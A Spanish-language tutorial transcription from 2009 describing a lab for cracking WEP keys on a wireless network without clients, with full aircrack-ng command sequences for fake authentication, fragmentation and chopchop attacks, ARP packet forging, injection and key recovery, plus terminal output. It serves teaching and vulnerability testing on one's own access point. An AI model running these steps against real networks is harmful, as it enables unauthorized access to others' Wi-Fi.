Descargar tutorial cracking WEP con WifiSlax 3.1

Transcripción

2009
Relis Inc.
Siler Amador Donado
[TUTORIAL CRACKING WEP]
Laboratorio paso a paso para realizar pruebas de vulnerabilidad sobre redes inalámbricas en un
ambiente controlado.
[TUTORIAL CRACKING WEP] 17 de diciembre de 2009
LABORATORIO PASO A PASO PARA REALIZAR PRUEBAS DE
VULNERABILIDAD SOBRE REDES INALÁMBRICAS
Adaptado por: Siler Amador Donado
Tomado de:http://www.aircrack-ng.org/doku.php?id=es:how_to_crack_wep_with_no_clients
Equipos usados en este tutorial:
Configuración 1
Dirección MAC de la interfaz eth1: 00:16:CE:07:FC:3E
BSSID (dirección MAC del punto de acceso): 00:18:39:BA:4E:0D
ESSID (nombre de la red Wireless): hackme1
Canal del AP: 6
Interface Wireless: eth1
Marca del AP: Linksys
Configuración 2
Dirección MAC de la interfaz ra0: 00:13:D3:7B:B9:31
BSSID (dirección MAC del punto de acceso): 00:18:39:BA:4E:0D
Canal del AP: 6
Interface Wireless: ra0
Marca del AP: Linksys
Configuración 3
Dirección MAC de la interfaz ra0: 00:13:D3:7B:B9:31
BSSID (dirección MAC del punto de acceso): 00:09:5B:A1:8A:42
Canal del AP: 11
Interface Wireless: ra0
Marca del AP: Netgear
Debe obtener la información equivalente de la red sobre la que desea trabajar y cambiar los valores
anteriores según corresponda. La siguiente es la configuración del AP Linksys WRT300N.
SILER AMADOR DONADO
Página 2
Para garantizar el éxito en el desarrollo de este laboratorio suponemos que:
Usa el liveCD con la versión 3.1 de la suite wifislax, la puede descargar de http://www.wifislax.org
Usa la versión 1.0 de la suite aircrack-ng-1.0, la puede descargar de http://www.aircrackng.org/downloads.html. Luego deberá descomprimirla y compilarla de la siguiente forma:
wifislax # tar -xvf aircrack-ng-1.0
wifislax # cd aircrack-ng-1.0
wifislax aircrack-ng-1.0 # make
wifislax aircrack-ng-1.0 # make strip
wifislax aircrack-ng-1.0 # make install
Está usando drivers parcheados para inyección. Puede capturar paquetes con Wireshark para
comprobar si está inyectando.
Está suficientemente cerca para enviar y recibir paquetes del AP. Recuerde que recibir paquetes
del AP no significa que los paquetes que transmita sean recibidos por el AP, la fuerza de la señal
de las tarjetas wireless generalmente es menor que la fuerza de la señal de los AP, por lo tanto, es
necesario estar cerca del AP para que los paquetes que transmita sean recibidos por el AP.
Debería confirmar que puede comunicare con el AP siguiendo estas instrucciones:
wifislax aircrack-ng-1.0 # aireplay-ng -9 ra0
08:15:33 Trying broadcast probe requests...
08:15:35 No Answer...
08:15:35 Found 1 APs
08:15:35 Trying directed probe requests...
08:15:35 00:18:39:BA:4E:0D - channel: 6 - 'hackme1'
08:15:41 Ping (min/avg/max): 1.944ms/145.035ms/194.523ms Power: 0.00
08:15:41 9/30: 30%
08:15:41 Injection is working!
Notación:
-9
Signica prueba de intrusión
ra0
Interfaz inalámbrica
SILER AMADOR DONADO
Página 3
wifislax aircrack-ng-1.0 # aireplay-ng -test -e hackme1 -a 00:18:39:BA:4E:0D ra0
08:17:26 Waiting for beacon frame (BSSID: 00:18:39:BA:4E:0D) on channel 6
08:17:26 Trying broadcast probe requests...
08:17:26 Injection is working!
08:17:28 Found 1 AP
08:17:28 Trying directed probe requests...
08:17:28 00:18:39:BA:4E:0D - channel: 6 - 'hackme1'
08:17:33 Ping (min/avg/max): 1.945ms/126.139ms/192.817ms Power: 0.00
08:17:33 4/30: 13%
Notación:
-test
Significa prueba de intrusión
-e
Nombre del SSID hackme1 del AP
-a
Dirección MAC 00:18:39:BA:4E:0D del AP
No hay paquetes de datos que vienen del punto de acceso. Beacons (balizas) y otros paquetes
como management frame packets son inútiles para nuestros propósitos en este tutorial. Una forma
rápida para comprobar el tráfico es ejecutar airodump-ng y ver si hay algún paquete de datos. En el
caso de tener paquetes de datos capturados del punto de acceso en otras sesiones, podríamos
usarlos para generar nuevo tráfico. Esto es para usuarios avanzados y este tutorial no da
instrucciones detalladas para este caso.
El punto de acceso usa ciframiento WEP abierto (open authentication). No funcionará si la
autenticación es compartida (shared key authentication) (SKA). Con SKA el único método si no
existen clientes es capturar el PRGA xor data con airodump-ng handshake o hacer previamente un
ataque con aireplay-ng. Esto es así porque necesita el archivo PRGA xor para hacer una falsa
autenticación de forma exitosa.
Usaremos la versión 1.0 de aircrack-ng. Si usa otra versión algunos comandos puede que se
escriban de forma diferente.
Asegúrese que cumpla todas las condiciones, de lo contrario no funcionará. En los siguientes
ejemplos, tendrá que cambiar eth1 por el nombre de la interface de su tarjeta wireless.
En los ejemplos, la opción guión doble bssid se muestra como - -bssid. Recuerde borrar el espacio
entre los dos guiones cuando lo utilice. Esto también se aplica a - -ivs.
A continuación los pasos que vamos a seguir para desarrollar el laboratorio con éxito:
1 - Fijar la dirección MAC de la tarjeta wireless
2 - Colocar la interface wireless en modo monitor y fijar el canal
3 - Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso
4 - Usar chopchop o ataque de fragmentación para obtener PRGA
5 - Usar packetforge-ng para crear un paquete arp usando el PRGA obtenido en el paso anterior
6 - Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar IVs
7 - Inyectar el paquete arp creado en el paso 5
8 - Ejecutar aircrack-ng para obtener la clave WEP
Paso 1 - Fijar la dirección MAC de la tarjeta wireless
No hemos cambiado la dirección MAC de nuestra tarjeta, en el caso que lo desee puede utilizar el
comando "macchanger". Esto es un recordatorio para que use su dirección MAC real y no una falsa. En
el paso 3 es importante que la dirección MAC que se use sea la de la su tarjeta para realizar la falsa
autenticación.
Paso 2 - Colocar la interfaz wireless en modo monitor y fijar el canal
Escriba el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 6:
wifislax aircrack-ng-1.0 # airmon-ng start ra0 6
El sistema nos responderá:
SILER AMADOR DONADO
Página 4
Interface
ra0
eth1
Chipset
Driver
Ralink 2560 PCI rt2500 (monitor mode enabled)
Broadcom
bcm43xx
Puede observar que ra0 aparece colocada en modo monitor. Escriba ifconfig ra0 up para levantar la
interfaz ra0 que usaremos a continuación. Para confirmar que la interfaz está bien configurada,
escribimos iwconfig. El sistema nos responderá:
lo
ra0
no wireless extensions.
RT2500 Wireless ESSID:""
Mode:Monitor Frequency=2.437 GHz Bit Rate=11 Mb/s Tx-Power:0 dBm
RTS thr:off Fragment thr:off
Encryption key:off
Link Quality=0/100 Signal level:-120 dBm Noise level:-79 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
eth0 no wireless extensions.
eth1 IEEE 802.11b/g ESSID:off/any Nickname:"Broadcom 4318"
Mode:Managed Access Point: Invalid
RTS thr:off Fragment thr:off
Encryption key:off
Link Quality=0/100 Signal level=-256 dBm Noise level=-256 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Podemos ver que ra0 está en modo monitor, en la frecuencia 2.437 GHz que corresponde al canal 6 y
en Access Point vemos la dirección MAC de nuestra tarjeta wireless. Es importante comprobar toda
esta información antes de continuar, ya que de lo contrario no funcionará.
Para ver la correspondencia entre frecuencia y canal, observe:
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels selecciona la etiqueta Wifi Channel
Selection and Channel Overlap. Así obtendrá la frecuencia para cada canal.
Problemas
Si tiene otra interfaz en modo monitor que no sea ra0, puede usarla o escribir airomon-ng stop raX
donde X es la interface que quiere parar.
Paso 3 - Usar aireplay-ng para hacer una falsa autenticación con el AP
Este es un paso muy importante. Para que un AP acepte un paquete, la dirección MAC debe estar
previamente asociada. Si la dirección MAC con la cual estas inyectando no está asociada, el AP
ignorará el paquete y enviará un paquete de desautentificación. En este caso, no se crearán nuevos IVs
porque el AP está ignorando todos los paquetes inyectados.
La falta de asociación con el punto de acceso es la razón más habitual por la cual falla la
inyección.
Para asociarse con un punto de acceso, usa el comando:
wifislax aircrack-ng-1.0 # aireplay-ng -1 0 -e hackme1 -a 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0
Notación:
-1 significa falsa autenticación (fake authentication)
0 tiempo de reasociación en segundos
-e hackme1 es el nombre de la red wireless
-a 00:18:39:BA:4E:0D es la dirección MAC del AP
-h 00:13:D3:7B:B9:31 es la dirección MAC de nuestra tarjeta wireless
ra0 es el nombre de nuestra interfaz
Si tenemos éxito aparecerá algo como esto:
SILER AMADOR DONADO
Página 5
18:18:20
18:18:20
18:18:20
18:18:20
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)
Otra variación que puede funcionar en algunos puntos de acceso:
wifislax aircrack-ng-1.0 # aireplay-ng -1 6000 -o 1 -q 10 -e hackme1 -a 00:18:39:BA:4E:0D –h
00:13:D3:7B:B9:31 ra0
Notación:
6000 Reautenticación cada 6000 segundos. En este periodo de tiempo se siguen enviando paquetes
de sigo aquí o keep alive packets.
-o 1 Envía solo un tipo de paquetes de cada vez. El valor por defecto es múltiple y esto puede confundir
a algunos APs.
-q 10 Se envían paquetes de sigo aquí cada 10 segundos.
18:22:32
18:22:32
18:22:32
18:22:32
18:22:42
18:22:52
# etc....
Sending keep-alive packet
Sending keep-alive packet
Ahora ponemos un ejemplo de un fallo de autenticación:
18:28:02
18:28:02
18:28:02
18:28:02
18:28:02
18:28:05
18:28:05
18:28:05
18:28:10
18:28:10
18:28:10
Got a deauthentication packet!
Preste atención a Got a deauthentication packet y los continuos intentos de asociación. No se debe
continuar al siguiente paso hasta que funcione la falsa autenticación de forma correcta.
Problemas
Algunos AP están configurados para permitir únicamente una dirección MAC para asociarse y
conectarse. Si este es su caso, no podrá realizar la falsa autenticación de forma éxitosa, salvo que
conozca una de las direcciones MAC que están permitidas para poder conectarse a ese AP.
Analice los problemas de filtrado MAC en este tutorial.
Si desea confirmar que está asociado de forma correcta puede usar tcpdump y mirar los paquetes.
Inicie una consola y escriba:
wifislax aircrack-ng-1.0 # tcpdump -n -e -s0 -vvv -i ra0
Si solo desea seleccionar los paquetes de deautenticación con tcpdump usa: tcpdump -n -e -s0 -vvv -i
ra0 | grep DeAuth. Puede cambiar la palabra DeAuth para escoger otros paquetes que desee buscar.
SILER AMADOR DONADO
Página 6
Paso 4 - Usar chopchop o ataque de fragmentación para obtener PRGA
El objetivo de chopchop y del ataque de fragmentación es obtener un archivo PRGA (del inglés pseudo
random generation algorithm o algoritmo de generación seudo aleatoria). Este PRGA no es la clave
WEP y no se puede usar para descifrar paquetes. Aunque, si puede usarse para crear nuevos
paquetes cifrados con la clave WEP para inyectarlos. La creación de nuevos paquetes la veremos más
adelante en el tutorial.
Tanto chopchop como el ataque de fragmentación pueden ser usados para obtener el archivo PRGA. El
resultado es el mismo, por lo que usa el que mejor te funcione. Los pros y contras de cada ataque
están descritos en la página de aircrack-ng.
A continuación exponemos primero el ataque de fragmentación. Abrimos otra consola y escribimos:
wifislax aircrack-ng-1.0 # aireplay-ng -5 -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0
Notación:
-5 significa ataque de fragmentación
-b 00:18:39:BA:4E:0D es la dirección MAC del punto de acceso
-h 00:13:D3:7B:B9:31 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección
MAC usada en la falsa autenticación
La respuesta que obtendremos será:
Waiting for a data packet...
Read 127 packets...
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:18:39:BA:4E:0D
Dest. MAC = 01:00:5E:00:00:01
Source MAC = 00:18:39:BA:4E:0B
0x0000:
0x0010:
0x0020:
0x0030:
0x0040:
0842 0000 0100 5e00 0001 0018 39ba 4e0d .B....^.....9.N.
0018 39ba 4e0b d0b7 579c 2d00 2e3a 422c ..9.N...W.-..:B,
eb9c 7df3 c4d7 4b48 75d9 719f 12f2 c8e8 ..}...KHu.q.....
b91a 9601 490c a906 74bd ccfc 18d1 8737 ....I...t......7
643a 499b
d:I.
Use this packet ? y
Cuando recibamos un paquete del punto de acceso, escriba y para continuar. Es probable que sea
necesario intentar más de una vez unos pocos paquetes para tener éxito.
Saving chosen packet in replay_src-0203-180328.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Trying to get 1500 bytes of a keystream
Saving keystream in fragment-0203-180343.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
SILER AMADOR DONADO
Página 7
Éxito! El archivo fragment-0203-180343.xor lo podremos usar en el siguiente paso para generar un
paquete arp.
Si con el ataque de fragmentación no hemos tenido éxito, podemos probar la técnica chopchop. Para
ello ejecute:
wifislax aircrack-ng-1.0 # aireplay-ng -4 ra0 -h 00:13:D3:7B:B9:31
Notación:
-4 significa ataque chopchop
-h 00:13:D3:7B:B9:31 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección
MAC usada en la falsa autenticación
Read 165 packets...
BSSID = 00:18:39:BA:4E:0D
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000:
0x0010:
0x0020:
0x0030:
0x0040:
0x0050:
0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0040 f477 e5c9 603a d600 0000 5fed a222 [email protected]..`:...._.."
e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
cfeb 4a72 be46
..Jr.F
Use this packet ? y
Conteste “y” y el proceso continuará.
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in
84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in
83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in
82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in
81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in
80 ( 9% done) | xor = CF | pt = 00 | 152 frames written in
79 (11% done) | xor = 05 | pt = 00 | 29 frames written in
77 (15% done) | xor = CA | pt = 00 | 24 frames written in
75 (19% done) | xor = 9E | pt = 00 | 36 frames written in
71 (26% done) | xor = A1 | pt = 00 | 43 frames written in
70 (28% done) | xor = 3E | pt = 00 | 98 frames written in
69 (30% done) | xor = BB | pt = 00 | 129 frames written in
68 (32% done) | xor = AE | pt = 00 | 248 frames written in
67 (34% done) | xor = FB | pt = 00 | 105 frames written in
65 (38% done) | xor = D4 | pt = 00 | 158 frames written in
SILER AMADOR DONADO
760ms
498ms
645ms
483ms
36ms
456ms
87ms
454ms
71ms
387ms
108ms
117ms
438ms
249ms
129ms
294ms
387ms
744ms
315ms
303ms
474ms
591ms
Página 8
Offset 63 (42% done) | xor = 7F | pt = 0C | 72 frames written in 217ms
Offset 62 (44% done) | xor = 1F | pt = 37 | 166 frames written in 497ms
Offset 61 (46% done) | xor = 5C | pt = A8 | 119 frames written in 357ms
Offset 60 (48% done) | xor = 9B | pt = C0 | 229 frames written in 687ms
Offset 59 (50% done) | xor = 91 | pt = 00 | 113 frames written in 339ms
Offset 56 (55% done) | xor = F3 | pt = 00 | 193 frames written in 579ms
Offset 55 (57% done) | xor = D6 | pt = 00 | 17 frames written in 51ms
Offset 54 (59% done) | xor = FA | pt = 00 | 81 frames written in 243ms
Offset 53 (61% done) | xor = EA | pt = 01 | 95 frames written in 285ms
Offset 52 (63% done) | xor = 5D | pt = 37 | 24 frames written in 72ms
Offset 51 (65% done) | xor = 33 | pt = A8 | 20 frames written in 59ms
Offset 50 (67% done) | xor = CC | pt = C0 | 97 frames written in 291ms
Offset 49 (69% done) | xor = 03 | pt = C9 | 188 frames written in 566ms
Offset 48 (71% done) | xor = 34 | pt = E5 | 48 frames written in 142ms
Offset 46 (75% done) | xor = 51 | pt = F4 | 253 frames written in 759ms
Offset 43 (80% done) | xor = 5E | pt = 01 | 194 frames written in 583ms
Offset 42 (82% done) | xor = AF | pt = 00 | 99 frames written in 296ms
Offset 41 (84% done) | xor = C4 | pt = 04 | 164 frames written in 492ms
Offset 40 (86% done) | xor = CE | pt = 06 | 69 frames written in 207ms
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...
The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.
Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor
Completed in 21s (2.29 bytes/s)
Fantástico! El archivo “replay_dec-0201-191706.xor” lo podremos usar en el siguiente paso para
generar un paquete arp.
Pequeñas ayudas
Asegúrate de que el paquete es de 68 o más bytes porque sino no tendrás suficientes datos PRGA
para generar el paquete. El PRGA capturado tiene que ser igual o mayor que la longitud del paquete
que queremos generar.
Para generar algunos paquetes y forzar el comienzo de chopchop, haga ping a una IP inexistente de su
red. Esto forzará que el AP emita un “arp broadcast” y este aparecerá en chopchop para ser usado.
Puede comprobar el paquete descifrado ejecutando “tcpdump -n -vvv -e -s0 -r replay_dec-0201191706.cap”.
En nuestro laboratorio:
reading from file replay_dec-0201-191706.cap, link-type IEEE802_11 (802.11) 19:17:06.842866 0us
DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:e5:c9 LLC, dsap SNAP (0xaa), ssap SNAP
(0xaa), cmd 0×03: oui Ethernet (0×000000), ethertype ARP (0×0806): arp who-has 192.168.1.12 tell
192.168.1.1
SILER AMADOR DONADO
Página 9
Puede reusar el paquete capturado ejecutando “aireplay-ng -4 ra0 -h 00:09:5B:EC:EE:F2 -r replay_src0201-191639.cap”. El nombre del archivo aparece cuando se inicia chopchop.
Si tiene un archivo de capturas de una sesión anterior, puede usarlo con el comando “aireplay-ng -4 ra0
-h 00:09:5B:EC:EE:F2 -r captura-sesión-anterior.cap”
Problemas
Si el primer paquete que ha seleccionado no funciona, pruebe unos pocos más. Algunas veces hay
que intentarlo varias veces para conseguir tener éxito en cualquiera de los ataques.
El ataque chopchop no funciona en algunos puntos de acceso. Si esto ocurre, pruebe el ataque de
fragmentación. Y viceversa.
Asegúrese de que está correctamente asociado al AP. Para comprobarlo siga las instrucciones del
paso 2 con tcpdump.
Paso 5 - Usar packetforge-ng para crear un paquete arp
En el paso anterior hemos obtenido el PRGA. No importa con que ataque hemos generado el PRGA.
Este PRGA se encuentra en los archivos con extensión “xor”. Podemos entonces usar este PRGA para
generar un paquete para inyectar. Generaremos un paquete arp para la inyección. El objetivo es que el
punto de acceso reenvíe continuamente el paquete arp inyectado. Cuando lo reenvíe obtendremos un
nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.
Pero primero vamos a generar el paquete arp para la inyección, escribiendo:
wifislax aircrack-ng-1.0 # packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k
255.255.255.255 -l 255.255.255.255.255 -y fragment-0203-180343.xor -w arp-request
Notación:
-0 significa generar un paquete arp
-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta wireless
-k 255.255.255.255 es la IP de destino (la mayoría de los APs responden a 255.255.255.255)
-l 255.255.255.255.255 es la IP de origen (la mayoría de los APs responden a 255.255.255.255)
-y fragment-0203-180343.xor es el archivo del que se leerá el PRGA
-w arp-request es el nombre del archivo en el que se guardará el paquete arp
Wrote packet to: arp-request
Pequeñas ayudas
Después de crear el paquete, use tcpdump para revisarlo. Escriba:
wifislax aircrack-ng-1.0 # tcpdump -n -vvv -e -s0 -r arp-request
reading from file arp-request, link-type IEEE802_11 (802.11)
10:49:17.456350 WEP Encrypted 258us BSSID:00:14:6c:7e:40:80 SA:00:09:5b:ec:ee:f2 DA:Broadcast
Data IV: 8f Pad 0 KeyID 0
Como estamos probando con nuestro propio AP (si no es así NO CONTINUES!), desciframos el
paquete y nos aseguramos que es correcto. Este paso no es necesario, solo sirve para comprobar
que hemos generado un paquete correcto.
Escribimos: “airdecap-ng -e hackme1 -w <tu clave WEP> arp-request”. Y para ver el paquete
descifrado: “tcpdump -n -r arp-request-dec”. Deberíamos observar algo como esto:
reading from file arp-request-dec, link-type EN10MB (Ethernet)
10:49:17.456350 arp who-has 255.255.255.255 tell 255.255.255.255
SILER AMADOR DONADO
Página 10
Paso 6 - Iniciar airodump-ng
Abrir otra consola para capturar los IVs generados. Y escribir:
wifislax aircrack-ng-1.0 # airodump-ng -c 6 –bssid 00:18:39:BA:4E:0D -w capture ra0
Notación:
-c 6 es el canal de la red wireless
– -bssid 00:18:39:BA:4E:0D es la dirección MAC del AP. Esto elimina el trafico de otras redes.
– -ivs especifica que solo capturaremos IVs. Así el archivo será muy pequeño. Pero no uses esta
opción si quieres utilizar “aircrack-ng -z”.
-w capture es el nombre del archivo en el que guardaremos los IVs.
ra0 es el nombre de nuestra interfaz.
Paso 7 - Inyectar el paquete arp
Usando la consola en la que generamos el paquete arp, escribimos:
wifislax aircrack-ng-1.0 # aireplay-ng -2 -r arp-request ath0
Notación:
-2 significa que usamos el modo interactivo para seleccionar el paquete
-r arp-request especificamos el nombre del archivo con el paquete arp
Obtendremos la siguiente respuesta:
BSSID = 00:18:39:BA:4E:0D
Source MAC = 00:09:5B:EC:EE:F2
0x0000:
0x0010:
0x0020:
0x0030:
0x0040:
0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[...
ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z...
c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8.
f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^
6ada 92f2
j...
Use this packet ? y
Escribimos “y” para usar este paquete. Veremos cuantos paquetes estamos inyectando y se nos
recuerda que iniciemos airodump-ng si no lo hemos hecho todavía:
You should also start airodump-ng to capture replies.
End of file.
Mientras este comando se está ejecutando de forma exitosa, en la ventana de airodump-ng veremos
algo similar a esto:
CH 6 ][ Elapsed: 16 s ][ 2009-12-12 11:04
BSSID
PWR RXQ Beacons
00:18:39:BA:4E:0D 47 100
BSSID
STATION
SILER AMADOR DONADO
179
#Data, #/s CH MB ENC CIPHER AUTH ESSID
2689 336 6 11 WEP WEP
hackme1
PWR Lost Packets Probes
Página 11
00:18:39:BA:4E:0D 00:09:5B:EC:EE:F2 29
0
2707
Puedes observar que solo hay un punto de acceso puesto que hemos incluido en airodump-ng el filtro
para limitar la captura a un único BSSID. También observa que los paquetes de la tarjeta son
aproximadamente los mismos que los paquetes (data) del BSSID. Esto significa que la inyección está
funcionando bien y se pierden pocos paquetes. También observa la velocidad de inyección (#/s) de 336
paquetes por segundo, lo cual es un indicador de que la inyección está funcionando muy bien. Esta es
una situación “ideal” de inyección.
Problemas
Si los paquetes del BSSID (data) no aumentan asegurate de que estas todavía asociado con el punto
de acceso. Para hacer esto, mira las instrucciones sobre tcpdump en el paso 2.
Paso 8 - Ejecutar aircrack-ng para obtener la clave WEP
Inicia otra consola y escribe:
wifislax aircrack-ng-1.0 # aircrack-ng -z -b 00:18:39:BA:4E:0D capture*.cap
Notación:
-z significa que se use el método PTW para obtener más rápido la clave WEP
capture*.cap selecciona todos los archivos que comienzan por “capture” y con extensión “cap”.
-b 00:14:6C:7E:40:80 selecciona el punto de acceso en el que estamos interesados
Puede ejecutar aircrack-ng mientras captura paquetes. En poco tiempo, verá la clave WEP. Usando el
método PTW, necesitará alrededor de 20,000 paquetes de datos para una clave de 64 bit y 40,000 para
claves de 128 bit. Recuerda que el métodoPTW solo funciona con paquetes ARP. Como este tutorial
solo cubre este tipo de paquetes no tendrás problema ninguno. El otro requerimiento es que has de
capturar con airodump archivos *.cap, lo que significa que no puedes usar laopción ”- -ivs”.
Si no usas la opción ”-z”, se aplicará el método FMS/Korek. Necesitarás aproximadamente 250,000 IVs
para una clave WEP de 64 bit y 1,500,000 IVs para claves de 128 bit. Esto es aproximado y hay
muchas variables que influyen en el número de IVs necesarios para obtener la clave WEP.
Problemas
Algunas veces es recomendable probar varias técnicas para obtener la clave WEP rápidamente.
Prueba la opción “-n” para fijar la longitud de la clave (por ejemplo -n 64). Usa “-f” y prueba diferentes
“fudge factors”. Usa “-k” y prueba a desabilitar los métodos korek.
Solución alternativa
Existe un pequeño engaño que simplifica el crackeo de la clave WEP sin clientes. Básicamente
consiste en recoger cualquier paquete “broadcast” del punto de acceso y convertirlo para que el punto
de acceso genere un nuevo IV.
Es importante que tenga en cuenta que si usa este truco, no podrá utilizar la opción ”-z” del método
PTW con aircrack-ng. Esto se debe a que el método PTW requiere paquetes arp y de esta forma no los
generamos.
OK, ahora se estará preguntando ¿por qué no usamos esta técnica paso a paso? La razón es que con
esta técnica se reenvían todos los paquetes que reciba. Por lo que si recibe un paquete de 1000 byte
entonces reenviara 1000 bytes. Esto reduce de forma muy importante el número de paquetes
capturados por segundo. Aunque, como ventaja podemos destacar que es muy simple y muy fácil de
hacer. Además puede que tenga suerte y que reciba un paquete muy pequeño para reenviar. En este
caso, esta técnica funcionará tan bien como la descrita con anterioridad en este tutorial.
Hay que tener en cuenta las mismas consideraciones y realizar con anterioridad una falsa
autenticación.
Escriba el siguiente comando:
SILER AMADOR DONADO
Página 12
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0
Notación:
-2 significa que usamos el modo interactivo para seleccionar el paquete
-p 0841 fija el “Frame Control” para que parezca que el paquete se está enviando desde un cliente
wireless.
c FF:FF:FF:FF:FF:FF fija la dirección MAC de destino como “broadcast”. Esto se requiere para que el
AP reenvie el paquete y así consigamos un nuevo IV.
-b 00:18:39:BA:4E:0D es la dirección MAC del punto de acceso
-h 00:13:D3:7B:B9:31 es la dirección MAC de nuestra tarjeta y debe coincidir con la utilizada en la falsa
autenticacion
El sistema nos contestará:
Read 698 packets...
BSSID = 00:18:39:BA:4E:0D
Source MAC = 00:D0:CF:03:34:8C
0x0000:
0x0010:
0x0020:
0x0030:
0x0040:
0x0050:
0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
00d0 cf03 348c a0f4 2000 0000 e233 962a ....4... ....3.*
90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ...gA...rq...#..
ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U...o..5_......
1daa a308 6a70 4465 9fa6 5467 d588 c10c ....jpDe..Tg....
f043 09f6 5418
.C..T.
Use this packet ? y
Escriba “y” para seleccionar el paquete y empezar la inyección. Recuerde, cuanto más pequeño sea el
paquete mucho mejor. Al empezar la inyección verás algo como esto:
Sent 10204 packets...(455 pps)
Si aun no has iniciado airodump-ng, ejecútalo ahora. Una vez que tengas suficientes IVs, puedes iniciar
aircrack-ng e intentar averiguar la clave WEP.
Otra variación de este ataque es usar paquetes de una captura anterior. Debes de tener guardados los
paquetes enteros, y no solo los IVs.
A continuación puedes ver cómo sería el comando:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 -r capture01.cap ra0
Donde ”-r capture-01.cap” es el archivo de una captura anterior.
Referencias
1. http://www.nextgameday.com/foro/f105/tutorial-auditoria-wireless-wifislax-saca-claves-wep-deredes-inalambricas-56761/
2. http://archive.aircrack-ng.org/slitaz/
3. http://www.aircrack-ng.org/doku.php?id=es:newbie_guide
4. http://www.aircrack-ng.org/doku.php?id=es:how_to_crack_wep_with_no_clients
5. http://www.aircrack-ng.org/documentation.html
6. http://www.aircrack-ng.org/downloads.html
7. http://www.aircrack-ng.org/
8. http://www.wifislax.org/
SILER AMADOR DONADO
Página 13

Descargar tutorial cracking WEP con WifiSlax 3.1

Transcripción

Documentos relacionados

Criptografía simétrica.

DEPARTAMENTO DE OFFSET

crucigramas 180 claves

The effect of the offset humeral head on the micromovement of